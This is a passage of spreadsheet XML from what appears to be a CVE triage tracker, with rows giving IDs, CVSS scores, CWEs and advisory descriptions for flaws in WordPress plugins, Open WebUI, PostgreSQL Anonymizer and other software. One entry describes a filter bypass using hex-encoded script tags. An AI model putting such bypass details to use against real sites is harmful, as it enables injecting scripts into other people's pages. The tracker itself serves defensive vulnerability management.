          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F792" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G792" s="5" t="inlineStr"/>
      <c r="H792" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I792" s="5" t="inlineStr"/>
      <c r="J792" s="5" t="inlineStr"/>
      <c r="K792" s="5" t="inlineStr"/>
      <c r="L792" s="5" t="inlineStr"/>
      <c r="M792" s="5" t="inlineStr"/>
      <c r="N792" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O792" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P792" s="5" t="inlineStr"/>
      <c r="Q792" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R792" s="5" t="inlineStr">
        <is>
          <t>Siyuan before v3.8.2 fails to apply publish-access filtering to embedded blocks before rendering in the /api/export/preview and /api/lute/copyStdMarkdown endpoints. Attackers with reader access can retrieve the full rendered content of private, hidden, or publish-disabled blocks by accessing public documents containing embed queries that select those blocks.</t>
        </is>
      </c>
      <c r="S792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87809</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88000</t>
        </is>
      </c>
      <c r="D793" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E793" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F793" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G793" s="5" t="inlineStr"/>
      <c r="H793" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I793" s="5" t="inlineStr"/>
      <c r="J793" s="5" t="inlineStr"/>
      <c r="K793" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L793" s="5" t="inlineStr">
        <is>
          <t>pip:open-webui</t>
        </is>
      </c>
      <c r="M793" s="5" t="inlineStr">
        <is>
          <t>0.11.1</t>
        </is>
      </c>
      <c r="N793" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O793" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P793" s="5" t="inlineStr"/>
      <c r="Q793" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R793" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, DELETE /api/v1/chats/{id}/messages/{message_id} used the chat-history deletion helper in backend/open_webui/models/chats.py to follow childrenIds without recording visited message identifiers. An authenticated user could store a cyclic chat tree and delete a message, causing a synchronous infinite loop on the server request loop that blocked every user's requests until the process was killed. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88000</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88002</t>
        </is>
      </c>
      <c r="D794" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E794" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F794" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G794" s="5" t="inlineStr"/>
      <c r="H794" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I794" s="5" t="inlineStr"/>
      <c r="J794" s="5" t="inlineStr"/>
      <c r="K794" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L794" s="5" t="inlineStr">
        <is>
          <t>pip:open-webui</t>
        </is>
      </c>
      <c r="M794" s="5" t="inlineStr">
        <is>
          <t>0.11.1</t>
        </is>
      </c>
      <c r="N794" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O794" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P794" s="5" t="inlineStr"/>
      <c r="Q794" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R794" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.5.0 until 0.11.1, the message-chain reconstruction helper in backend/open_webui/utils/misc.py advanced through a chat history by map key but tracked visited entries using each message body's optional id field. An authenticated user could store id-less messages in a parent cycle and trigger a non-terminating walk that blocked the async event loop, grew memory until termination, and remained persistent across process restarts. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88002</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13709</t>
        </is>
      </c>
      <c r="D795" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E795" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F795" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G795" s="5" t="inlineStr"/>
      <c r="H795" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I795" s="5" t="inlineStr"/>
      <c r="J795" s="5" t="inlineStr"/>
      <c r="K795" s="5" t="inlineStr"/>
      <c r="L795" s="5" t="inlineStr"/>
      <c r="M795" s="5" t="inlineStr"/>
      <c r="N795" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O795" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P795" s="5" t="inlineStr"/>
      <c r="Q795" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R795" s="5" t="inlineStr">
        <is>
          <t>The Graphina – Charts and Graphs For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'iq_tree_tree_chart_template' Widget Setting in all versions up to, and including, 3.1.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13709</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17149</t>
        </is>
      </c>
      <c r="D796" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E796" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F796" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G796" s="5" t="inlineStr"/>
      <c r="H796" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I796" s="5" t="inlineStr"/>
      <c r="J796" s="5" t="inlineStr"/>
      <c r="K796" s="5" t="inlineStr"/>
      <c r="L796" s="5" t="inlineStr"/>
      <c r="M796" s="5" t="inlineStr"/>
      <c r="N796" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O796" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P796" s="5" t="inlineStr"/>
      <c r="Q796" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R796" s="5" t="inlineStr">
        <is>
          <t>The Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program – myCred plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wrapper' Shortcode Attribute in all versions up to, and including, 3.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17149</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19634</t>
        </is>
      </c>
      <c r="D797" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E797" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F797" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G797" s="5" t="inlineStr"/>
      <c r="H797" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I797" s="5" t="inlineStr"/>
      <c r="J797" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K797" s="5" t="inlineStr"/>
      <c r="L797" s="5" t="inlineStr"/>
      <c r="M797" s="5" t="inlineStr"/>
      <c r="N797" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O797" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P797" s="5" t="inlineStr"/>
      <c r="Q797" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R797" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a SQL injection vulnerability in two import functions. A user can create a malicious JSON document containing specially crafted object names. If a superuser subsequently calls anon.import_database_rules() or anon.import_roles_rules(), the malicious code is executed with superuser privileges. The issue is fixed in PostgreSQL Anonymizer 3.1.4 and later</t>
        </is>
      </c>
      <c r="S797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19634</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19945</t>
        </is>
      </c>
      <c r="D798" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E798" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F798" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G798" s="5" t="inlineStr"/>
      <c r="H798" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I798" s="5" t="inlineStr"/>
      <c r="J798" s="5" t="inlineStr"/>
      <c r="K798" s="5" t="inlineStr"/>
      <c r="L798" s="5" t="inlineStr"/>
      <c r="M798" s="5" t="inlineStr"/>
      <c r="N798" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O798" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P798" s="5" t="inlineStr"/>
      <c r="Q798" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R798" s="5" t="inlineStr">
        <is>
          <t>The WP Crowdfunding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'first_name' parameter in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. An administrator viewing any user's profile via the ?show_user_id= parameter will render the attacker's stored payload in the admin's browser session, enabling cross-privilege script execution.</t>
        </is>
      </c>
      <c r="S798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19945</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54746</t>
        </is>
      </c>
      <c r="D799" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E799" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F799" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G799" s="5" t="inlineStr"/>
      <c r="H799" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I799" s="5" t="inlineStr"/>
      <c r="J799" s="5" t="inlineStr"/>
      <c r="K799" s="5" t="inlineStr"/>
      <c r="L799" s="5" t="inlineStr"/>
      <c r="M799" s="5" t="inlineStr"/>
      <c r="N799" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O799" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P799" s="5" t="inlineStr"/>
      <c r="Q799" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R799" s="5" t="inlineStr">
        <is>
          <t>Hatchet is a platform for orchestrating background tasks, AI agents, and durable workflows at scale. From 0.40.0 until 0.91.1, the Dispatcher gRPC service does not verify that a request's worker ID belongs to the tenant identified by the bearer-token context in Dispatcher/UpsertWorkerLabels and Dispatcher/Unsubscribe. An authenticated owner of any tenant who guesses another tenant's worker UUID can overwrite that worker's affinity labels or disconnect the worker from the dispatcher. This can cause cross-tenant integrity impact and denial of service on multi-tenant Hatchet Cloud or shared self-hosted deployments. Single-tenant deployments are not practically affected because the attacker and target tenant are the same. This issue is fixed in version 0.91.1.</t>
        </is>
      </c>
      <c r="S799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54746</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62861</t>
        </is>
      </c>
      <c r="D800" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E800" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F800" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G800" s="5" t="inlineStr"/>
      <c r="H800" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I800" s="5" t="inlineStr"/>
      <c r="J800" s="5" t="inlineStr"/>
      <c r="K800" s="5" t="inlineStr"/>
      <c r="L800" s="5" t="inlineStr"/>
      <c r="M800" s="5" t="inlineStr"/>
      <c r="N800" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O800" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P800" s="5" t="inlineStr"/>
      <c r="Q800" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R800" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Prior to 3.18.0, any authenticated non-guest workspace member can remove another workspace's public custom domain and make typebots on that domain unavailable. The custom-domain delete handler in handleDeleteCustomDomain.ts authorizes a caller against a client-supplied workspaceId but sends the client-supplied domain name to the shared Vercel project before verifying that the domain belongs to that workspace. This issue is fixed in version 3.18.0.</t>
        </is>
      </c>
      <c r="S800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62861</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75966</t>
        </is>
      </c>
      <c r="D801" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E801" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F801" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G801" s="5" t="inlineStr"/>
      <c r="H801" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I801" s="5" t="inlineStr"/>
      <c r="J801" s="5" t="inlineStr"/>
      <c r="K801" s="5" t="inlineStr"/>
      <c r="L801" s="5" t="inlineStr"/>
      <c r="M801" s="5" t="inlineStr"/>
      <c r="N801" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O801" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P801" s="5" t="inlineStr"/>
      <c r="Q801" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R801" s="5" t="inlineStr">
        <is>
          <t>The Podlove Podcast Publisher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'episode_contributor[..][..][comment]' Parameter in all versions up to, and including, 4.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The contributor comment is stored in a plugin-managed custom table, bypassing WordPress core's wp_kses_post filter, and the save_post hook fires without a nonce check, meaning any user who can edit posts can exploit this without further preconditions.</t>
        </is>
      </c>
      <c r="S801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75966</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77186</t>
        </is>
      </c>
      <c r="D802" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E802" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F802" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G802" s="5" t="inlineStr"/>
      <c r="H802" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I802" s="5" t="inlineStr"/>
      <c r="J802" s="5" t="inlineStr"/>
      <c r="K802" s="5" t="inlineStr"/>
      <c r="L802" s="5" t="inlineStr"/>
      <c r="M802" s="5" t="inlineStr"/>
      <c r="N802" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O802" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P802" s="5" t="inlineStr"/>
      <c r="Q802" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R802" s="5" t="inlineStr">
        <is>
          <t>The My Calendar – Accessible Event Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'fallback' Shortcode Attribute in all versions up to, and including, 3.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The bypass relies on hex-encoded shortcode attribute payloads (e.g. \x3cscript\x3e), which wp_kses_post cannot strip on save because they appear as literal backslash sequences rather than real HTML tags; WordPress core's shortcode_parse_atts() then calls stripcslashes() at render time, decoding the escapes into real angle brackets before they reach the unescaped sink.</t>
        </is>
      </c>
      <c r="S802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77186</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77187</t>
        </is>
      </c>
      <c r="D803" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E803" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F803" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G803" s="5" t="inlineStr"/>
      <c r="H803" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I803" s="5" t="inlineStr"/>
      <c r="J803" s="5" t="inlineStr"/>
      <c r="K803" s="5" t="inlineStr"/>
      <c r="L803" s="5" t="inlineStr"/>
      <c r="M803" s="5" t="inlineStr"/>
      <c r="N803" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O803" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P803" s="5" t="inlineStr"/>
      <c r="Q803" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R803" s="5" t="inlineStr">
        <is>
          <t>The My Calendar – Accessible Event Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'before' and 'after' Shortcode Attributes in all versions up to, and including, 3.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77187</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79974</t>
        </is>
      </c>
      <c r="D804" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E804" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F804" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G804" s="5" t="inlineStr"/>
      <c r="H804" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I804" s="5" t="inlineStr"/>
      <c r="J804" s="5" t="inlineStr"/>
      <c r="K804" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L804" s="5" t="inlineStr"/>
      <c r="M804" s="5" t="inlineStr"/>
      <c r="N804" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O804" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P804" s="5" t="inlineStr"/>
      <c r="Q804" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R804" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Authentication vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79974</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82081</t>
        </is>
      </c>
      <c r="D805" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E805" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F805" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G805" s="5" t="inlineStr"/>
      <c r="H805" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I805" s="5" t="inlineStr"/>
      <c r="J805" s="5" t="inlineStr"/>
      <c r="K805" s="5" t="inlineStr"/>
      <c r="L805" s="5" t="inlineStr"/>
      <c r="M805" s="5" t="inlineStr"/>
      <c r="N805" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O805" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P805" s="5" t="inlineStr"/>
      <c r="Q805" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R805" s="5" t="inlineStr">
        <is>
          <t>wallabag 2 through 2.6.14 allows SSRF because a crafted title or content field is mishandled during PDF export.</t>
        </is>
      </c>
      <c r="S805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82081</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B806" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83534</t>
        </is>
      </c>
      <c r="D806" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E806" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F806" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G806" s="5" t="inlineStr"/>
      <c r="H806" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I806" s="5" t="inlineStr"/>
      <c r="J806" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K806" s="5" t="inlineStr"/>
      <c r="L806" s="5" t="inlineStr"/>
      <c r="M806" s="5" t="inlineStr"/>
      <c r="N806" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O806" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P806" s="5" t="inlineStr"/>
      <c r="Q806" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R806" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a vulnerability in the anon.anonymize_database_parallel() function that allows the owner of a table to run arbitrary code with superuser privilege. The issue is fixed in PostgreSQL Anonymizer 3.2.0 and later versions</t>
        </is>
      </c>
      <c r="S806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83534</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13148</t>
        </is>
      </c>
      <c r="D807" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E807" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F807" s="5" t="inlineStr">
        <is>
          <t>10de8ef9-5c89-4b17-8228-e97b74acf4bd</t>
        </is>
      </c>
      <c r="G807" s="5" t="inlineStr"/>
      <c r="H807" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I807" s="5" t="inlineStr"/>
      <c r="J807" s="5" t="inlineStr"/>
      <c r="K807" s="5" t="inlineStr"/>
      <c r="L807" s="5" t="inlineStr"/>
      <c r="M807" s="5" t="inlineStr"/>
      <c r="N807" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O807" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P807" s="5" t="inlineStr"/>
      <c r="Q807" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R807" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime vulnerability in Softing smartLink allows resource leak exposure.
This issue affects smartLink HW-PN: from 1.04 before 1.10.</t>
        </is>
      </c>
      <c r="S807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13148</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C808" s="5" t="inlineStr">
